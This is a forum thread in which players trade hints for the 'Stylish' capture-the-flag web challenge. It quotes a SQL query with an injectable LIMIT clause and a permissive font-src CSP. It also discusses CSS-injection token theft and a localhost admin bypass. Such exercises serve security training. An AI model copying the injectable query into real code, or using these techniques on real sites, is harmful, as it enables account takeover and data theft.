Official Stylish Discussion

system · April 5, 2024, 8:00pm

Official discussion thread for Stylish. Please do not post any spoilers or big hints.

sarp · April 7, 2024, 9:13pm

Nice challenge. Read the code meticulously. You’ll figure out

Chief999 · April 8, 2024, 8:28am

Anyone got any hints?

hotel · April 10, 2024, 12:05am

I got to the injection but can’t UNION after LIMIT… any hints?

hotel · April 10, 2024, 12:36am

oh… never mind… I got it… I will have to write a small code to make it more elegant… nice kek

EldenBin · April 10, 2024, 1:52pm

Hi, need a hint please…

hotel · April 10, 2024, 4:51pm

Hint 1:

app.use(function(req, res, next) {
	res.setHeader("Content-Security-Policy", "default-src 'self'; object-src 'none'; img-src 'self'; style-src 'self'; font-src 'self' *;")
    next();
});

Hint 2:

	async getSubmissionComments(submissionID, pagination=10) {
		return new Promise(async (resolve, reject) => {
			try {
                const stmt = `SELECT content FROM comments WHERE id_submission = ${submissionID} LIMIT ${pagination}`;
                resolve(await this.db.all(stmt));
			} catch(e) {
				reject(e);
			}
		});
	}

c0derpwner · April 12, 2024, 9:51am

i got approvalToken but i cannot execute a successfully approval with token i’ve generated for my id

c0derpwner · April 12, 2024, 7:34pm

Finally understood pwned thanks

Jimmy-1 · April 13, 2024, 5:12pm

Im stuck here, any hints?

Anakin01 · April 16, 2024, 12:43am

Hey can you drop another hint for me.The hint 1 provided by you was very helpful but still I am not able to figure out the exact injection payload.
I tried lot of css injection techniques, but i am unable to get the approval token.

exp01vipplus02 · April 21, 2024, 3:37pm

how can we send Out-of-Band while only font-src ‘self’ * can use? img and style-src both self :<<

hotel · April 23, 2024, 4:33pm

For the injection. What if you can’t get any strings? Maybe you can get some number…
As long as you have 255 comments or more… you can represent any ascii char using numbers…

exp01vipplus02 · April 25, 2024, 1:13pm

i can steal all char in the token but i dont know the order :<<

hotel · April 25, 2024, 2:10pm

look at the token generation algorithm… I am sure you will sort it out…

exp01vipplus02 · April 27, 2024, 1:49pm

yeh, i can steal the token but 2 days i try to bypass it const isAdmin = req => ((req.ip == ‘127.0.0.1’) ? 1 : 0);
It was taken me a lot of time. I still dont bypass ssrf here :<<. smb help me

tryingHarder · April 28, 2024, 5:11am

been going to school on this one what works there does not seem to work here. it seems i can steal all but what need, tells me i m missing class and forgot my id.

having to code has made it even more frustrating as it lets you test what you can do after you have the token.

hotel · April 28, 2024, 4:01pm

maybe you could trigger the approval using the same trick you used to find the token…

tryingHarder · April 28, 2024, 9:58pm

sometimes just posting helps you figure out how to see what you could not see…

exp01vipplus02 · April 29, 2024, 1:09pm

■■■, that sooooo coool